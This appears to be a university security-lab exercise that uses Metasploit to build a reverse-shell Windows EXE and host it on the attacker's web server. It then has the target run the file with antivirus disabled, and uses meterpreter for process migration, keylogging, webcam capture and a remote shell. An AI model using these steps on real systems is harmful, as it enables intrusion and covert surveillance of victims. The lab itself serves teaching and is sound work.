4: Creating Infectious Media with Metasploit (15 pts.)

What You Need

Purpose

We will use Kali Linux and Metasploit to create an infectious EXE file.

A user who runs that file surrenders control of their computer.

Finding the Attacker's IP Address

On your Linux machine, in a Terminal window, execute this command:
ifconfig
Find your IP address and make a note of it. In the example below, it is 172.16.1.203.

Using Msfvenom to Make a Malicious EXE

In Kali, execute this command to learn about msfvenom, which is part of Metasploit.
msfvenom -h
A help message appears, as shown below.

In Kali, execute these commands to create a malicious Windows executable file named "fun.exe" and serve it from a malicious Web server.

Adjust the IP address to match the IP address of your Kali machine (the C&C server). No LPORT is given, so the payload calls back to msfvenom's default port, 4444; the handler you start later must listen on that same port.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.1.203 -f exe > /var/www/html/fun.exe
service apache2 start
The operation proceeds without errors, as shown below.

Launching Msfconsole

In Kali, execute this command to start msfconsole, the main control system for Metasploit.
msfconsole
Metasploit launches, as shown below.

In Kali, at the msf> prompt, execute this command.

help
Several pages of help scroll by. The section we'll use is "Module commands", as shown below.

Starting a Command-and-Control (C&C) Server

Execute these commands to start a C&C listener.
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
exploit
Metasploit starts a "reverse TCP handler", as shown below.

Running the Malware on the Target Machine

On the target Windows machine, open a Web browser and open this URL, replacing the IP address with the IP address of your Kali machine:
http://172.16.1.203/fun.exe
The file "fun.exe" downloads. Bypass any warning boxes, double-click the file, and allow it to run.

Note: if you are using antivirus, you will need to disable it. You will also need to disable Windows Defender. If you have problems disabling your malware protection, use the Windows 2008 Server virtual machine, which has no malware protection.

On your Kali machine, a meterpreter session opens, as shown below.

Using The Meterpreter Shell

On your Kali machine, at the meterpreter > prompt, execute this command:
help
Several pages of help scroll by, listing many interesting commands, as shown below.

Migrating to a Different Process

The Meterpreter shell is running inside the "fun.exe" process. If the user closes that process, or logs off, the connection will be lost.

To survive the user closing fun.exe, we'll migrate into a process that will last longer.

To see a list of processes, at the meterpreter > prompt, execute this command:

ps
Let's migrate to the explorer.exe process, the user's desktop shell, which normally stays alive for as long as the user is logged on.

At the meterpreter > prompt, execute this command:

migrate -N explorer.exe
Migration is unreliable: it may succeed, or it may time out. If it times out, run the command again. When it succeeds, the output looks like the image below.

If you can't get it to work after a few tries, skip it and proceed to the next section.

Post-Exploitation

You now own the target! Here are some fun meterpreter commands to try:

screenshot - Gives you an image of the target's desktop
keyscan_start - Begins capturing keys typed on the target. On the Windows target, open Notepad and type in some text, such as your name.
keyscan_dump - Shows the keystrokes captured so far
webcam_list - Shows the available webcams (if any)
webcam_snap - Takes a photo with the webcam
shell - Gives you a Windows Command Prompt on the target
exit - Leaves the Windows Command Prompt

Viewing Network Connections

On your Kali machine, at the meterpreter > prompt, execute this command:
netstat
A list of network connections appears, including one to a remote port of 4444, as highlighted in the image below.

Notice the "PID/Program name" value for this connection, which is redacted in the image below.
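To pick the owning process out of a long connection list without reading every row, you can filter meterpreter's netstat output by remote port. This is an added example, not part of the original lab: the sample listing below is constructed to follow the column layout of meterpreter's netstat (Proto, Local address, Remote address, State, User, Inode, PID/Program name), and the PIDs and addresses in it are made up. If the migration in the previous section succeeded, expect the owner to be the process you migrated into rather than fun.exe.

```shell
#!/bin/sh
# Added example, not from the original lab: find the "PID/Program name" that
# owns the reverse-shell connection in meterpreter's `netstat` output.
# SAMPLE_NETSTAT is constructed for this example; the PIDs and addresses are
# invented, only the column layout follows meterpreter's listing.

SAMPLE_NETSTAT='Connection list
===============

    Proto  Local address        Remote address       State        User  Inode  PID/Program name
    -----  -------------        --------------       -----        ----  -----  ----------------
    tcp    0.0.0.0:135          0.0.0.0:*            LISTEN       0     0      716/svchost.exe
    tcp    0.0.0.0:445          0.0.0.0:*            LISTEN       0     0      4/System
    tcp    172.16.1.100:49172   172.16.1.203:4444    ESTABLISHED  0     0      2292/fun.exe
    tcp    172.16.1.100:49180   13.107.4.52:443      ESTABLISHED  0     0      1880/svchost.exe'

# Print the PID/Program name of every connection whose REMOTE port is $1.
# Reads a netstat listing on stdin; header and separator rows are skipped
# because they do not start with a protocol name.
# Usage: printf '%s\n' "$listing" | c2_owner 4444
c2_owner() {
    awk -v port="$1" '
        $1 ~ /^(tcp|udp)6?$/ && $3 ~ (":" port "$") { print $NF }
    '
}

# Convenience wrapper over the constructed sample, for a stand-alone run.
demo() {
    printf '%s\n' "$SAMPLE_NETSTAT" | c2_owner "${1:-4444}"
}
```

Run `demo` (or pipe real output saved from the meterpreter session into `c2_owner 4444`); the single line it prints is the value the scoring form asks for.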

4: Recording Your Success

Use the form below to record your score in Canvas.

If you don't have a Canvas account, see the instructions here.

Name or Email:
PID/Program name:

Updated 5-23-18 to run as a CTF
Minesweeper link removed 6-14-18
Integrated with Canvas 6-27-18